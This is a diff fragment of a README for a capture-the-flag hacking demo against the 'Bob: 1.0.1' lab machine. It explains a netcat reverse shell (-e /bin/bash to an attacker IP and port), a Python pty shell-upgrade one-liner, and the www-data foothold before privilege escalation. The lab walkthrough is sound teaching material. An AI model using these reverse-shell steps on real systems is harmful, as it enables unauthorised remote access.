cristinavisentin/hackingdemo/README.md

 - `-e /bin/bash` specifies the program to execute after connection, in this case, a Bash shell.
 - `10.0.2.6 6000` specifies the hostname and port number of the server side.

+The established shell is a reverse shell since the server side is on the attacker's machine, and it is the target side that initiates the connection to the attacker.

-Although the attempt aims to establish a remote Bash shell on the Kali virtual machine, the spawned process is only a basic Sh shell.
-To upgrade it to a more powerful and interactive shell,  on the server side of the connection the following text line is written:
+On the server side of the connection the following text line is written:

 ```bash
 python -c 'import pty;pty.spawn("/bin/bash")'
 ```
-This command invokes a Bash shell using the command line Python interpreter.

-The established shell is a reverse shell since the server side is on the attacker's machine, and it is the target side that initiates the connection to the attacker.
+This Python script spawns a new Bash shell process solely to enhance visualization: this additional process offers a more interactive command-line interface (CLI) by providing a prompt, displaying the current directory, and presenting feedback during interactions with the shell.

 Now it is possible navigate the file system of _Bob: 1.0.1_ machine.
 The current account is `www-data`, but it is needed to gain higher privileges to complete the challenge, in fact moving to the root directory of the file system and listing files with `ls -l` command it's possible to see that the `flag.txt` file can be opened only by root account because it is the legitimate owner.